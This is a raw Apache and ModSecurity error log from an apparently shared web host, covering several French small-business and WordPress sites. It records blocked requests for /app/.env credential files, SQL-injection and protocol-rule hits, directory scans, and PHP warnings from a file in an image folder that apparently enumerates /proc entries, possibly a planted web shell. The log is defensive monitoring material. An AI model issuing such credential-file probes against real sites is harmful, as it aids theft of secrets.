[Tue May 12 00:32:19.933767 2026] [security2:error] [pid 1606352:tid 1606432] [client 43.160.219.206:36720] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nearoo.fr"] [uri "/"] [unique_id "agJY83o_DFxNSZVmaX36vQAAAM0"]
[Tue May 12 00:32:29.832605 2026] [security2:error] [pid 1605480:tid 1605525] [client 43.165.167.72:42704] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agJY_R2Cvzd_nyNfUm8qGwAAAQM"]
[Tue May 12 00:32:33.003681 2026] [security2:error] [pid 1606352:tid 1606439] [client 43.165.167.72:45868] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agJZAXo_DFxNSZVmaX36ygAAANQ"], referer: http://www.cpc-entreprises.com
[Tue May 12 00:32:42.225778 2026] [authz_core:error] [pid 1605480:tid 1605535] [client 47.128.23.49:56092] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/blocks/error_log
[Tue May 12 00:33:11.516292 2026] [security2:error] [pid 1630927:tid 1630932] [client 176.65.139.231:48712] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/app/.env"] [unique_id "agJZJ2iGYYhUwDaJINm5ygAAAUI"]
[Tue May 12 00:33:11.516775 2026] [security2:error] [pid 1630927:tid 1630932] [client 176.65.139.231:48712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/app/.env"] [unique_id "agJZJ2iGYYhUwDaJINm5ygAAAUI"]
[Tue May 12 00:33:14.141362 2026] [security2:error] [pid 1630927:tid 1630932] [client 176.65.139.231:48712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJZJ2iGYYhUwDaJINm5ygAAAUI"]
[Tue May 12 00:33:14.342052 2026] [security2:error] [pid 1601130:tid 1601153] [client 176.65.139.239:51574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.labaujue.com"] [uri "/app/.env"] [unique_id "agJZKnEgAO_835W6c1nDFwAAAEM"]
[Tue May 12 00:33:14.342283 2026] [security2:error] [pid 1601130:tid 1601153] [client 176.65.139.239:51574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.labaujue.com"] [uri "/app/.env"] [unique_id "agJZKnEgAO_835W6c1nDFwAAAEM"]
[Tue May 12 00:33:15.500934 2026] [security2:error] [pid 1601130:tid 1601153] [client 176.65.139.239:51574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.labaujue.com"] [uri "/index.php"] [unique_id "agJZKnEgAO_835W6c1nDFwAAAEM"]
[Tue May 12 00:34:10.214082 2026] [:error] [pid 1630927:tid 1630936] [client 89.163.151.66:39872] File does not exist: /home/piregwan/public_html/wp-login.php
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704916/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704916/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704916/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704916/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704916/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704916/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:34:43.624616 2026] [security2:error] [pid 1606352:tid 1606438] [client 129.226.83.4:52094] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/galeries/"] [unique_id "agJZg3o_DFxNSZVmaX37dQAAANM"]
[Tue May 12 00:35:01.483845 2026] [authz_core:error] [pid 1606352:tid 1606423] [client 47.128.23.213:30668] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Response/error_log
[Tue May 12 00:35:14.667372 2026] [security2:error] [pid 1590352:tid 1590406] [client 43.156.122.201:33724] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-content/uploads/2020/05/304-Coup"] [unique_id "agJZoq1q0G_aXAqWauQm9wAAAI4"]
[Tue May 12 00:35:36.503387 2026] [security2:error] [pid 1630927:tid 1630951] [client 43.164.197.117:44004] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/cession-reprise-dentreprise-en-difficulte/"] [unique_id "agJZuGiGYYhUwDaJINm60QAAAVU"]
[Tue May 12 00:35:39.963645 2026] [security2:error] [pid 1605480:tid 1605527] [client 43.156.168.214:45524] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/downloads/Composition_Orgue-Cheron.pdf"] [unique_id "agJZux2Cvzd_nyNfUm8rlAAAAQU"]
[Tue May 12 00:36:00.255466 2026] [security2:error] [pid 1630927:tid 1630950] [client 49.51.233.95:46282] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/conditions-generales-de-location/"] [unique_id "agJZ0GiGYYhUwDaJINm69AAAAVQ"]
[Tue May 12 00:36:08.436386 2026] [security2:error] [pid 1605480:tid 1605543] [client 43.134.53.242:33158] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJZ2B2Cvzd_nyNfUm8rswAAARU"]
[Tue May 12 00:36:09.123583 2026] [security2:error] [pid 1630927:tid 1630942] [client 171.22.133.66:44062] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d39376e7439fc10e074e4afe0850cc7c||1778540755||1778540395"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJZ2WiGYYhUwDaJINm7BwAAAUw"], referer: https://la-grande-fabrique.com/?p=2314
[Tue May 12 00:36:09.123809 2026] [security2:error] [pid 1630927:tid 1630942] [client 171.22.133.66:44062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJZ2WiGYYhUwDaJINm7BwAAAUw"], referer: https://la-grande-fabrique.com/?p=2314
[Tue May 12 00:36:09.124744 2026] [security2:error] [pid 1630927:tid 1630942] [client 171.22.133.66:44062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agJZ2WiGYYhUwDaJINm7BwAAAUw"], referer: https://la-grande-fabrique.com/?p=2314
[Tue May 12 00:36:11.367703 2026] [security2:error] [pid 1605480:tid 1605525] [client 43.134.53.242:46324] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJZ2x2Cvzd_nyNfUm8rtgAAAQM"], referer: http://rentparadise.fr
[Tue May 12 00:36:22.775246 2026] [authz_core:error] [pid 1601130:tid 1601169] [client 37.77.150.124:50180] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/error_log, referer: https://rixonephotography.com/wp-includes/
[Tue May 12 00:36:42.825219 2026] [:error] [pid 1605480:tid 1605534] [client 43.156.34.42:47890] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:36:51.072029 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:36:52.067732 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705208/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705208/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705208/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705208/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705208/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705208/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:37:26.464156 2026] [security2:error] [pid 1691274:tid 1691286] [client 43.167.236.228:39562] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/it-porn/"] [unique_id "agJaJlfdQaraX_prmqfz4wAAAAk"]
[Tue May 12 00:37:40.044149 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:37:41.047349 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:37:44.409122 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:37:45.469979 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:37:46.669779 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:37:47.702381 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:38:05.408875 2026] [security2:error] [pid 1605480:tid 1605539] [client 43.130.101.151:48862] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/13-octobre-2023-concert-punk-rock-a-la-baujue/"] [unique_id "agJaTR2Cvzd_nyNfUm8snAAAARE"]
PHP Warning:  filesize(): stat failed for /proc/113/task/113/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/113/task/113/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/113/task/113/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/113/task/113/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/113/task/113/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/113/task/113/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:38:17.803151 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:38:18.817355 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:38:32.703278 2026] [autoindex:error] [pid 1605480:tid 1605528] [client 20.9.31.235:35182] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:38:34.305997 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:38:40.669175 2026] [ssl:error] [pid 1691274:tid 1691298] (EAI 2)Name or service not known: [client 176.65.139.234:35778] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:38:40.669604 2026] [ssl:error] [pid 1691274:tid 1691298] AH01941: stapling_renew_response: responder error
[Tue May 12 00:38:40.703206 2026] [security2:error] [pid 1691274:tid 1691298] [client 176.65.139.234:35778] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/app/.env"] [unique_id "agJacFfdQaraX_prmqf0VAAAABc"]
[Tue May 12 00:38:40.703615 2026] [security2:error] [pid 1691274:tid 1691298] [client 176.65.139.234:35778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/app/.env"] [unique_id "agJacFfdQaraX_prmqf0VAAAABc"]
[Tue May 12 00:38:40.704020 2026] [security2:error] [pid 1691274:tid 1691298] [client 176.65.139.234:35778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agJacFfdQaraX_prmqf0VAAAABc"]
[Tue May 12 00:38:42.102608 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 20.9.31.235:29894] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
